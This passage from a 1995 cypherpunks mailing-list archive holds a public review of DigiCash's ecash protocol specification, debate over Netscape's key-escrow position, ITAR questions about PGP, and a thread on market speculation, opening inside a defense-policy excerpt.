   parked in a more vulnerable spot), to nuclear or chemical 
weapons,
   biological agents, and their analogue in cyberspace 
information
   warfare.
   
   Devices that can cause terror are getting easier to 
manufacture and
   transport and harder to detect. The equipment for 
replicating
   biological agents is inexpensive; the equipment for 
replicating
   computer agents is even cheaper. Many otherwise third-world 
Asian
   nations have very large computer-literate cohorts that make 
them
   potential information warfare powers. ...
   
   Chaos
   
   Over the next two decades, states will continue to fail. 
Some failures
   may create circumstances (e.g., refugees, malcontents, and
   environmental damage) which topple other states. To cope, 
the United
   States may need a robust capability to conduct peace and 
relief
   operations. ...
   
   A concentration on peace operations may also be a good 
reason to
   expand foreign military interactions. Improving 
interoperability with
   future coalition partners carries many advantages. Yet, 
above a
   certain technological level of integration, the risk of 
exposing
   information on U.S. capabilities to what may be temporary 
allies has
   to be carefully managed.
   
   If countering chaos were the primary mission of the U.S. 
armed forces,
   then they would have to become lighter and more mobile 
(because states
   often fail with little warning, and the United States 
usually responds
   only in extremis). The Army and Marine Corps would have 
larger roles,
   while the Navy and Air Force would focus on lift. As 
emergency
   operations become the norm, some functions assigned to 
reserve units
   may have to be shifted to active ones (e.g., to allow civil 
affairs
   assets to be used more frequently).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Sun, 3 Dec 1995 09:44:42 +0800
To: cypherpunks@toad.com
Subject: Questions/Comments on ecash protocol
In-Reply-To: <199512012222.OAA18230@netcom14.netcom.com>
Message-ID: <199512030127.RAA03496@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <mtwain@netcom.com> wrote, to our great pleasure:
> By popular request, DigiCash is releasing the protocol specs.
> 
> The specs are available at 
> http://www.digicash.com/ecash/protocol.html
> 
> Please be aware that the doccument is work in progess. More 
> specifications, including byte level descriptions of the message 
> format will be added throughout the weekend.

I read these specs for a little while last night.  Here are some of my
questions/comments.  To prevent this message from becoming huge, I won't
quote much from the protocol document itself; the URL is above if you want it.
I'll ignore the spelling/grammar; they can be fixed later.

Also: would people prefer if this discussion were moved to the ecash
mailing list (ecash@digicash.com)?  I _would_ prefer that this was discussed
in public, though, and not just with DigiCash.

First:  Could you put some kind of protocol version number (so we know when
the protocol changes) and document version number (so we know when the
document changes, and can reference a particular version) somewhere near
the top of the document?

I realize that the document is incomplete.  For example, it is missing
a description of the SETUP_REQ message and response.  From what I can gather
from other wording in the document, this message is used to get the bank's
public key.  I would hope this key is certified in some way.  Alternatively,
I notice that the ecash client, in the routine ec_cash_setup, passes a value
called hard_n (a 768-bit composite) to check_sig.  Does this mean that
the bank's public key (or at least the public key used to sign the message
containing that bank's real public key) is fixed, and hardcoded into the
client?

What is the function f, used in the payment_hdr to hash the payer_code
and desc fields, as well as in WITHDRAW3 to calculate N = f(n) * r**h?
There is reason to believe it is SHA, but I thought I saw some stuff in the
client that indicated that the output of f is 132 _bytes_ long (but I'm
not exceptionally sure of this, not having source and all).

What are the flags used in the Withdraw Request and the payment_hdr?

Please clarify what parts of the payment_hdr are shipped around.  The document
says that the shop checks if the descr_hash matches the description.
Since the description is in the second part of the payment_hdr, does that
mean that both parts are sent to the shop?  Noticing that the payer_code
(which the payer is supposed to keep secret) is in the second part, this
doesn't seem to be right.  Also, the document states that the payment hash
is not sent from the payer to the shop or from the shop to the mint.  However,
the payment hash is just the SHA of the first part of the payment_hdr,
which _is_ sent around, so although the payment hash isn't transmitted
per se, it can certainly be calculated.

What is the expries field in the payment_hdr?  Note that it's an int rather
than a time.

A (very slight) privacy concern: the payer's bank is sent in the clear,
which gives a very small amount of information about the identity of the
payer.  More on who knows what later.

Is it in fact the case that all coins on one payment use the same payment hash
when encrypting their signatures (the field sig in onl_coin)?

If (M,e) is the mint's public modulus/exponent, and (N,h) is public mod/exp
for a particular coin denomination, are the following statements true:

o If n is the coin number (in onl_coin, assumedly the same n as used in the
  withdraw request), and hdr is the first part of the payment header,
  then sig (in onl_coin) equals

     ([ SHA(hdr) XOR ((f(n)^(1/h)) mod N) ] ^ e) mod M

o A deposit (which contains a userID in the userhdr, a payment_hdr in
  the dep record, and a pair (n,sig) for each coin) is accepted by the bank iff

     ([ SHA(payment_hdr) XOR ((sig^(1/e)) mod M) ] ^ h) mod N = f(n)

  _and_ either payment_hdr.shop_accID corresponds to userID,
	  or   a payer_code is supplied such that
		 payment_hdr.payer_hash = f(payer_code).

Since the payer_code is not supposed to be sent around, how is it sent to
the bank in order to cancel a payment?  The document says "This allows him
to cancel the payment (deposit in his account)...", which seems to indicate
that a cancellation is just a deposit (made out to someone else), accompanied
by an appropriate payer_code.  It is important that an eavesdropper not
be able to ever see the payer_code that corresponds to a payment, or
else she could present both to the bank and say "cancel this payment",
and get the money "back".

Where is the facility for tracing double spenders?  Perhaps it's just
part of the "incomplete" part of the document, but I can't even see
where it would fit in to what we've got; neither the withdrawal nor the
payment messages seem to encode _any_ information about the payer in
the coins, and the bank cannot seem to know who withdrew the coin that
ended up being spent twice (due to the blinding).

Is there a way to change the public key associated with an account?
Is it just a meeter of sending another OPENACC1 message?

Exactly what kind of anonymity/privacy/security does ecash offer?
Let's examine who knows what.

Our cast of characters:

Charlie, the customer
Sam, the shopkeeper
the Bank (for simplicity, both Charlie and Sam use the same Bank for now)
Eve, a passive eavesdropper
Mitch, an active Man-In-The-CHannel
the Government (which may try to force others to reveal information)

Depending on which channels Eve and Mitch have access to, and whether or
not they can tell, by examining the channel, or by selection, the
identities of one or more of the communicating parties, they can get
varying amounts of information.  I'll assume they have access to
all communications for now.

Not knowing the SETUP_REQ protocol is problematic.  As mentioned above,
steps need to be taken to prevent Mitch from getting Charlie's password
and using it to usurp his account.  We will assume that it turns out OK,
and that Charlie can successfully open an account with a private key known
only to him, and that he correctly knows the bank's public key.

[ As this is getting long, I've snipped a bit from here.  I'll put it
  back, with more detail, when the protocol document is more complete,
  and my questions above have been answered. ]

In short, a couple of things:

Eve and Mitch know how much was paid to whom, and for what.  If they
can tell (say, by TCP header) who was sending the payment or receiving
the payment request, they know who paid as well.

If Eve or Mitch can determine either r (the blinding factor) used in
the withdrawal, or the payer_code, used in the payment, they can steal the
money.  This has ramifications to Doug's "agnostic" banks; more security
has to be added to the present ecash system if unblinded withdrawals are
allowed.  This also brings up the "Netscape" question: how are these numbers
generated?  Does it have to do with that 25 character string you enter
at the beginning?  I've noticed a bit in the program that seeds a RNG with
(time(0) ^ ((getpid()<<16)|getuid())).  I think publication of _at least_
the code pertaining to blinding factor and payer_code generation is
_absolutely vital_.

I think I'll stop here; comments from anyone, and especially answers to my
questions from DigiCash people, are welcome.  I'm sorry if it's not as
complete as you (or I) would like; I'm quite tired, as my building had
two fire alarms in a row at 3am this morning...

   - Ian "Well, it's a start..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 3 Dec 1995 10:52:06 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512030205.SAA12208@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995 anonymous-remailer@shell.portal.com wrote:

> > The market seems to "think" that it's a better present judge 
> > of what Netscape has than he does.  It's almost as though 
> > the "market" has developed a "mind" of its own.  
> 
> Well, of course! Markets are the most efficient integration of the minds
> of the participants, hands down. 

Hands down efficient integration??  Not especially.  

First you have to really wonder what and who the "participants" in
this market are.  As an example, year-ends have certain particular
momentums.  So do capital gains considerations.  All part of the mind
of Buddha, as some of the fruitcake players might say ... and all part
of the known interplaying "participants".

> > It's own particular neural network.  
> 
> Exactly. Literally. And huge, too.

Except that this one doesn't listen to any of its sensors or input
devices.  It's learned to ignore all of *that* information, because
all of *that* information is inherently untrustworthy, so it simply
listens to it's very own dialogue.

Sort of like feeding off of a feedback loop.

> > It's almost as though there is automated software at work. 

Just like October, 1987.  

It simply listened to itself and kept telling itself that it was
"actually" making money all the way down.  Portfolio Insurance be
damned, it was doing "OK".

> There is: Wetware. Massive concurrent processing, heavy parallelism,
> inefficient I/O. Distributed, redundant memory. Inefficient but infinitely
> adaptable interprocessor routing. Capable of handling any degree of
> outage. All elements individually expendable. Self-replicating processors
> that have significant lead time but integrate smoothly into the net.
> Designs and builds its own outboard peripherals and interconnects. Best
> damned planetary computing system in this star system. But I diverge... 

IMHO, there is very little wetware left in the market.  This is now
the 90's.  Time to get with the programs.

> It's not always right (though self-fulfilling prophecy is often a big
> part of the equation), and it often misses the anolamies, but because it
> IS an integration is precisely why it may mean something different than
> you suggest. 

Oooo ... duelling programs ... especially one which is designed to
ignore the other one and not listen to any of its "blather" ... this
oughta be interesting to watch ...

Luckily, I'm outside this theatre of operations. 

> Netscape's share price more directly reflects the personal involvement and
> upward view of real people with respect to the Internet/WWW than anything
> else we have. 

"Personal" involvement and "real" people have very little to do with a
market that is driven by institutions and other vectors.  

Institutions which have to "show" what their exposure to the
"technology and Internet" sector is when they file their portfolio
reports will want to show something on their book.  And they'll look
for a safety in numbers thing, and will flock to the "darlings".

"Real people's views" also won't count for much if Netscape defines
an entire new economic sector -- the ground floor of the Internet.  
"Real people" don't factor in if it becomes part of the S&P 500 and
every index fund "has" to -- by definition -- buy it.  

"Real people" also have very little impact on the blow crazed trader
who's on a run and actually actively managing and turning-over the
pension funds or mutual funds of some group.  (Or even a sector fund,
whose by-laws won't allow it to sit on cash, as it flows in the door.)

These guys have far more influence than the aggregate of individuals
who might buy or sell "small" lots at the market.

"Real people" don't impact nor control the communications networks of
block trading reports.  And they don't impact systems which *must* put
their money out, and put it to work.  Real people are really just
noise in the flow.

The idea that individual supply/demand is what moves prices is a
fallacy.  It's not the "reality" behind the shell game.

Buying or selling pressure doesn't ever function as a price mover,
because for every "buyer" there is a corresponding "seller".
Zero-sums type of stuff.  It no more reflects the inherent strength of
the Internet, than the Dutch Tulip craze reflected the inherent
strength of Tulips.

> Remember, there are still naysayers out there, declaiming in places
> from books to columns to TV, while the reality is that computers are
> now outselling televisions, and a key new form of synergistic human
> communication is exploding in exponential growth.  Humans deal on a
> personal level only moderately well with linear processes, and
> poorly with geometric processes -- it's understandable that the
> growth of the Internet/WWW and the implications of thereof would be
> late in being recognized and be incorrectly understood until
> sometime AFTER the changes have rocked the society.

Nonsense.  (No offence, btw ...)  

We're back to the man who simply closes his eyes to what's happening,
or the ostrich sticking its head in the sand.  We've already got the
experience to understand how these things work.  

They've got the "play book", and are following it step by step. 

> Capitalize ME to the tune of $5 billion, for instance, and I may
> be influential not only during the course of your life but the lives of
> your great-grandchildren. 

Capitalize how?  Balance sheet?  Or market?  A $1 Billion or $2 Billion  
rights issue might be one thing, but this one is another.

> Selling Netscape short may or may not be a wise move -- selling market
> processes short is usually a fool's exercise in self-delusion. 

It really depends on what and how you use that tool, doesn't it??  

As an example, short sales are excellent ways of "creating" stock in
thin markets.  They can work to create a virtual share.  This might
sound strange, but it's a feature of the "market".

"Shorts" usually sell borrowed stock hoping to buy it back cheaper at
some later date.  A broker goes out and "borrows" the stock from
another broker, and then that stock is sold to a buyer.  The two legs
of the short sale actually work together to create a "virtual" share
of the corporation.  This creates "volume" by trading a "virtual
share".  At some point, these used to be called derivative plays,
before that word became dirty in and of itself.

To explain.

Let's say that XCO owns 100 shares of Spyglass.  And YCO "shorts" 100
Spyglass.  What actually happens is that YCO has simply signed a note
saying that they "owe" XCO's broker 100 shares of Spyglass.  If YCO
now sells that stock to ZCO, then there are actually now 200 shares of
spyglass out there.  100 actual ones owned by XCO, and 100 virtual
ones owned by ZCO.  (And a note to someone that says ... I owe ya, a
100 Spyglass.)

But the "virtual" stock is indistinguishable from the "actual" stock.

Of course the generally known risk is that with price movements that
YCO could loose a lot of money on its short.  Especially in a
"squeeze" play.

But if YCO and ZCO are actually "friendly" then all they have to do is
shift a lot of money around as the price gyrates.  Back-to-back credit
facilities usually suffice for this purpose, since all that they
really need is a "note" from their banker saying that they're "good
people" and are "good for the money", if something does go wrong.

That their credit is good in the casino.

(And mathematically in fact ... they are good for the money ... cause
they don't have a market "position" or opinion, even though they can
trade one heck of a lot.)

In this case, the short can't be "squeezed" cause he's actually covered.

But it can lead to some really interesting optics.  And these programs
do listen to optics.  Especially if YCO and his ZCO friend are up
against ACO and his BCO friend.

I think it's all just a virtual war at that point.  Something to watch
via Quotron.  But then you'd need a Quotron for that, wouldn't you??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.














> 
> We Jurgar Din
> (that will have to suffice: I do not yet live in a free country)
> 
> +"The battle, Sir, is not to the strong alone. It is to the+
> +vigilant, the active, the brave. Besides, Sir, we have no +
> +election. If we were base enough to desire it, it is now  +
> +too late to retire from the contest." -Patrick Henry 1775 +
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBVAwUBMMCsBEjw99YhtpnhAQE04QH8C+jk59lxyAqkVlfhd2VLw3TJKnECdXXJ
> fNE7S0QZyd5eqFnZ4wTyHeX18YfTg+xiFZPPfxpRCdgO/x2K8sxFWQ==
> =/2cN
> -----END PGP SIGNATURE-----
> 
> 
> 
> 
> 
> 
> 
> 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 3 Dec 1995 09:14:34 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
Message-ID: <199512030053.SAA00818@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.
> The fundamental issue is how do we accommodate the requirements of
> governments, while protecting our rights as citizens.
> 
> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.

I don't expect Netscape, as a corporate citizen, to engage in civil
disobedience.  But I hope that Netscape will take seriously its obligation
to protect the rights of citizens. 

Decisions that businesses make have big effects on the way day to day 
life exists all over the world.  GM makes decisions that affect how safe 
transportation will be and how much it will cost.  Microsoft makes 
decisions that effect millions of people's work environments.  Even small 
businesses have small bits of power:  I run a little ISP, and a few 
hundred people depend on me to protect the privacy of their email.

The decison that Netscpae is faced with now is a big one.  It's going to 
have widespread and long lasting consequences for privacy and civil 
liberties all over the world.  When you look at what's going to happen on 
the ground, it's probably as important as a major decision by the Supreme 
Court.

We understand that government officials in this country and elsewhere are 
putting pressure on Netscape.  But you should understand that the public 
is overwhelmingly in favor of universal access to strong crypto.  This is 
a democracy, after all, and the FBI and NSA still work for the people.  
If you need help standing up for what's right, you'll get it.  Take your 
case to the public, and you'll be suprised at the response you'll get.


Why not say:

	1	Netscape will follow all laws and regulations.
	2	The current rules are forcing Netscape to choose
		between providing reasonable levels of privacy
		to its customers and competing in the international
		marketplace.
	3	Netscape feels the rules should be changed to make
		this choice unnecessary.

If you make that argument publicly, you'll get widespread support from the
business communitity and the general public.  And if it turns out that we
can't win, you can always fall back on selling totalitarian-friendly
products.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 1995 11:37:04 +0800
To: cypherpunks@toad.com
Subject: Re: Remind me why we're so mad at Netscape
Message-ID: <199512030316.TAA05756@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 12/2/95 -0500, Matt Blaze <mab@crypto.com> wrote:
>Could someone please remind me what it is we're mad at Netscape about?
>As far as I can tell it's some combination of the following offenses:
>
>(a) - Jim Clark made a speech in which he revealed that he thought the
>government would be a player in determining the way cryptography ends
>up being deployed on the Internet.  He was quoted in the trade press,
>but it was unclear exactly which words were actually his.  Asked to
>clarify, he said that Netscape would implement mandatory government
>access across its product line only if required to by law, but he
>observed that things seem to be moving in that direction.  I share his
>pessimism, unfortunately, unless we find a way to shift the winds.

I give Netscape a lot of credit for the way they've handled things so far;
their US commercial version supports strong crypto (modulo a few bugs :-),
and interoperates with their free exportable version, which is itself
far stronger than a minimal 40-bit version could have been.
And they're adding secure email to the new version.
And (while they can't officially say this, of course) anybody overseas
can pirate the strong-crypto version if 40 bits aren't enough.

PGP gave anybody who wanted to do a bit of work the ability to
do trusted communications, but it's still not widely used because
it does take extra work; the most important things it's done have
been to raise public awareness and make it obvious to everybody
that the cat's out of the bag, which also pressured the government
into dealing with the issue.  Netscape is putting built-in strong crypto
in the hands of tens of millions of people; fait accompli like that
make it much harder for governments to impose stupid and offensive rules.

Maybe Netscape will come out with GAKed versions for export to nosy-governmented
countries like France and the US; as long as the main version has secure
communications, and they're open about how their crypto really works,
we can talk securely domestically, and other folks can pirate them to
use instead of GAKware.  If the government wants to pay extra to support
special hardware crypto modules for their own use, and the modules do GAK,
that's an internal problem (as long as we can subpoena their records.)
Of course, in case the main US versions ever have GAK as a default,
I do reserve the right to flame Netscape again :-)


>(d) Their stock price is very high, many times greater than their
>profits and physical assets would seem to justify.  I'm not sure I
>understand the implication here.  

I think it's that "Netscape is now in a financial position that pushes
them to care more about making some profits to justify their appallingly
high stock price so they're more likely to lose big bucks if
they don't sell out, and I should have bought it at $70..."

>Disclaimer: I'm employed full time by a soon-to-be-tri-vested major
>player in the military industrial complex, and us sellouts like to
>stick together.

Definitely.  Back when I was a tool of the military-industrial complex,
I was two floors down from Matt, in an RF-shielded room :-)

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 3 Dec 1995 11:34:40 +0800
To: John Young <jya@pipeline.com>
Subject: Re: EXO_ner
Message-ID: <v03003e00ace6c5d1f9c1@[129.46.82.85]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:34 AM 12/2/95, John Young wrote:

>SenXon and The Washrag blow today about which has the most to
>be ashamed of and hide from the filthy lingerie leering
>republic.

Exon, Exoff, XON, X-off, Exxon, ex-off.

   dave

____________________________________________________________________
"Packwood's supporters were left groping for answers." --news anchor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 1995 11:46:50 +0800
To: Ted Cabeen <cabeen@netcom.com>
Subject: Re: Use of PGP as an export?
Message-ID: <199512030324.TAA07279@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 PM 12/2/95 -0800, Ted Cabeen <cabeen@netcom.com> wrote:
>I think this has been brought up before, but I could only find one reference
>to it in the archives and it wasn't too helpful, so I'll ask again.  If a
>university provided a copy of PGP for use on their unix machines and a
>non-resident, non-citizen *used* the copy of PGP on the server, but did not
>download it onto their own machine, but instead just ran PGP on the server
>alone, would it be a violation of the ITAR?  My school is interested in
>putting a copy of PGP on the university server and wants to know if they
>should somehow restrict access to citizens and legal residents only.  Thanks.

That's not giving technical data to the foreigner, that's providing a service;
the ITAR doesn't seem to restrict that.  It's not an especially secure way to
operate, but that's an inherent problem with multi-user systems or file servers.
One way to implement it that would be only mildly insecure would be to put PGP
on a file server, with execute-only permissions; users of client machines
still could be attacked by somebody faking out NFS, but they wouldn't have
to send their passphrases across the net the way they would in a telnet session.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Dec 1995 11:53:38 +0800
To: iang@cory.EECS.Berkeley.EDU
Subject: Re:  Questions/Comments on ecash protocol
Message-ID: <199512030334.TAA18144@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
> I read these specs for a little while last night.  Here are some of my
> questions/comments.  To prevent this message from becoming huge, I won't
> quote much from the protocol document itself; the URL is above if you want it.
> I'll ignore the spelling/grammar; they can be fixed later.

I was also reading it, and I share some of Ian's questions, but for some
things I have a few different guesses.

> What is the function f, used in the payment_hdr to hash the payer_code
> and desc fields, as well as in WITHDRAW3 to calculate N = f(n) * r**h?
> There is reason to believe it is SHA, but I thought I saw some stuff in the
> client that indicated that the output of f is 132 _bytes_ long (but I'm
> not exceptionally sure of this, not having source and all).

One rather cryptic sentence, which Ian alludes to later, relates to
cancelling payments:  "The 'payer_hash' is the one-way image of a by
the payer generated random number...".  In the diagram it shows it as
f(payer_code), where payer_code is shown as "random code generated by
player".  (And, as Ian points out later, the document inconsistently
says that "the player generated random number" should be kept secret
while requiring that it be sent to the shop - at least, this is
inconsistent if it refers to payer_code.)  Assuming the use of the word
"a" is not a typo but refers to some number, this suggests that f() is
at least potentially a two-input function, some value a and a player
generated random number.

> Please clarify what parts of the payment_hdr are shipped around.  The document
> says that the shop checks if the descr_hash matches the description.
> Since the description is in the second part of the payment_hdr, does that
> mean that both parts are sent to the shop?  Noticing that the payer_code
> (which the payer is supposed to keep secret) is in the second part, this
> doesn't seem to be right.  Also, the document states that the payment hash
> is not sent from the payer to the shop or from the shop to the mint.  However,
> the payment hash is just the SHA of the first part of the payment_hdr,
> which _is_ sent around, so although the payment hash isn't transmitted
> per se, it can certainly be calculated.

It seems that the whole payment_hdr is sent to the shop, and only the
portion before the line is sent to the bank.  This is enough, as you say,
to calculate the payment hash, so the bank can decrypt the coins.  This
prevents the shop from changing any of the information in that first part
of the payment header before sending it to the bank.

My question in this part relates to coins made out to "@" which we have
been told can be deposited by anyone.  How does the bank know to which
account to deposit such a coin, given a deposit message?  The shop's ID
does not seem to be present in such a message, assuming that the
shop_accID field of the payment_hdr just has "@" in that case.  Is it the
userid field in the userhdr message which tells the bank this info?

BTW since apparently both deposit and payment messages are not encrypted,
coins made out to "@" are in danger of being stolen both while en route
from customer to shop and from shop to bank.  This is significant from
the point of view of payee anonymous systems, which will need to use such
coins.  More encryption will be necessary when such coins are passed
around.

> A (very slight) privacy concern: the payer's bank is sent in the clear,
> which gives a very small amount of information about the identity of the
> payer.  More on who knows what later.

Well, I would think identification of the payer's bank will be
necessary for any coin based system so you know where to cash in the
coins, so I don't think this is going to go away.  Of course as of now
everyone has the same bank so it is not an issue.

> Is it in fact the case that all coins on one payment use the same payment hash
> when encrypting their signatures (the field sig in onl_coin)?

The signatures are xor'd with the payment hash, but this is not the main
way they are encrypted - they are then encrypted with the bank's public
key.  The purpose of this xor is not so much to protect the coins as to
bind them unbreakably to the payment header.  Since the coins are always
sent around with that payment header I think they all do use the same
payment hash.

> If (M,e) is the mint's public modulus/exponent, and (N,h) is public mod/exp
> for a particular coin denomination, are the following statements true:
> 
> o If n is the coin number (in onl_coin, assumedly the same n as used in the
>   withdraw request), and hdr is the first part of the payment header,
>   then sig (in onl_coin) equals
> 
>      ([ SHA(hdr) XOR ((f(n)^(1/h)) mod N) ] ^ e) mod M

I was wondering about this too.  There is a reblocking problem in
trying to concatentate "pure RSA" operations.  In particular M must be
at least as big as N.  This is not necessarily a problem, but it is a
slightly unusual constraint on key creation.  However I agree overall
that this formula is a reasonable reading of the doc.

> o A deposit (which contains a userID in the userhdr, a payment_hdr in
>   the dep record, and a pair (n,sig) for each coin) is accepted by the bank iff
> 
>      ([ SHA(payment_hdr) XOR ((sig^(1/e)) mod M) ] ^ h) mod N = f(n)
> 
>   _and_ either payment_hdr.shop_accID corresponds to userID,
> 	  or   a payer_code is supplied such that
> 		 payment_hdr.payer_hash = f(payer_code).

There also needs to be some clause for the "@" payee.  In that case I
think the payment is accepted if the signature checks, with credit to the
userID account.

That business about cancelling via payer_code I agree is not very
sensible.  It doesn't seem necessary - the coin can just be re-spent,
made out to someone else.

> Where is the facility for tracing double spenders?  Perhaps it's just
> part of the "incomplete" part of the document, but I can't even see
> where it would fit in to what we've got; neither the withdrawal nor the
> payment messages seem to encode _any_ information about the payer in
> the coins, and the bank cannot seem to know who withdrew the coin that
> ended up being spent twice (due to the blinding).

There is no such thing!  This is one of the most common misconceptions.
This version of ecash does not trace double spenders.  It prevents double
spending by checking each coin to make sure it has not already been
spent.  Tracing of double spending is only necessary in offline systems
where coins are not checked right away, but that is not present here.

> Is there a way to change the public key associated with an account?
> Is it just a meeter of sending another OPENACC1 message?

My guess is there would need to be some manual intervention to do this.

> Exactly what kind of anonymity/privacy/security does ecash offer?
> Let's examine who knows what.
> [...]
> If Eve or Mitch can determine either r (the blinding factor) used in
> the withdrawal, or the payer_code, used in the payment, they can steal the
> money.  This has ramifications to Doug's "agnostic" banks; more security
> has to be added to the present ecash system if unblinded withdrawals are
> allowed.  This also brings up the "Netscape" question: how are these numbers
> generated?  Does it have to do with that 25 character string you enter
> at the beginning?  I've noticed a bit in the program that seeds a RNG with
> (time(0) ^ ((getpid()<<16)|getuid())).  I think publication of _at least_
> the code pertaining to blinding factor and payer_code generation is
> _absolutely vital_.

Well, as I said, I think this payer_code business is pretty questionable.
I'm sure the next version of the doc will clear that up a great deal.  As
far as determining r, that is not possible from the protocol messages.
Chaum has proven that it is absolutely indeterminate.  So I don't
understand what you mean about "more security has to be added to the
present ecash system if unblinded withdrawals are allowed."  Do you just
mean that the coin messages should not be sent in the clear in that case?
I observed that coin withdrawal messages can be sent in the clear in some
postings I made last year - the use of r effectively encrypts them.  But
of course that can't be done with unblinded messages.

There have been claims that the long string you type in at startup time
deterministically seeds the RNG, so that if you lose your wallet but you
tell DigiCash this string (via some secure channel, presumably) they can
reconstruct the coins you should have.  Presumably they could figure out
what the r values were when you withdrew all your coins, reconstruct the
coin numbers, and see which ones haven't been spent.  This is both good
and bad, in that it provides a well understood amount of entropy (rather
than relying on whatever it can scrounge up), but of course is vulnerable
to lazy typing.  Also, you have to write down the string, and if someone
found this they could perhaps get your coins.

> I think I'll stop here; comments from anyone, and especially answers to my
> questions from DigiCash people, are welcome.  I'm sorry if it's not as
> complete as you (or I) would like; I'm quite tired, as my building had
> two fire alarms in a row at 3am this morning...
> 
>    - Ian "Well, it's a start..."

Very good comments.  I'm sure the next version will be much better if
they are careful to clear up the kinds of issues you have raised.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Dec 1995 12:22:18 +0800
To: jsw@netscape.com
Subject: Re:  Info on Netscape's key escrow position
Message-ID: <199512030408.UAA19830@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I will join the chorus of criticism:

From: Jeff Weinstein <jsw@netscape.com>, quoting Jim Clark:
> I said that if we are to use this encryption technology in business, we must
> have a better solution than to limit keylength or put keys in escrow.

I don't understand this.  What is the better solution?  No other solution
seems to be discussed by Clark.  Most of his message is devoted to
rationalizing the inevitable changeover to key escrow, which he just
dismissed as unacceptable.

> All
> governments of the world have a valid concern about terrorism and other
> activities of concern to the security of their nations. All of them will
> continue to restrict our ability to provide products to their markets unless
> we build in some mechanism that allows them to legally access
> information that is in the interest of their national security.

This isn't true!  The US government (and I believe most other Western
governments, France excepted) does not presently provide any
restrictions on providing products to US citizens which have strong
cryptography.  There are serious constitutional questions about whether
it could ever do so.  Clark's message seems to be based on the
assumption that legal restrictions on crypto are a fait accompli.
Nothing could be further from the case.  What makes me mad is that his
messages seems to promote an attitude which could increase the
likelihood of these kinds of restrictions.  If people think the battle
is already lost, they will be less likely to fight.  IMO this is going
to be a big, knockdown fight and the eventual outcome is far from
certain.

> A lot of ordinary citizens are rightly concerned about their own privacy. I
> am one of them. I do not want the government to snoop on me, but in fact the
> government, through the FBI, can now tap my phone without my knowing it by
> simply getting sufficient evidence that I am conducting illegal activities,
> then presenting this evidence to a court to get permission. I have no say in
> the matter.

Again Clark is preaching acquiescence.  We have no say in the matter.
Our phones can be tapped any time the FBI wants.  What is the relevance
of this to the issue of network communications privacy?  Doesn't this
again sound like a justification for giving up the battle before it is
joined?  Where is his righteous indignation?  Where is the recognition
that the right to tap communications is not granted by God but an
accident of technology, one which can be taken away by technological
progress as easily as it was granted?

> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.

False!  I can open a company today in this country and take exactly that
position, and the US government will NOT put me out of business.  What
country is Clark living in?

> The fundamental issue is how do we accommodate the requirements of governments,
> while protecting our rights as citizens.

As I wrote in another context, when a question is framed in terms of
conflicts between the rights of governments and citizens, it is based on
a totally misguided premise.  There are no conflicts between the rights
of governments and citizens in our country.  The only rights are those of
citizens.  The real issue is the conflict between the rights of the
citizens to privacy and freedom versus their right to security and
safety.  I think we all know what Ben Franklin had to say about that.

> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.

Again Clark attempts to anticipate the advent of a totalitarian style
system of controls on access to cryptography in this country.  Should we
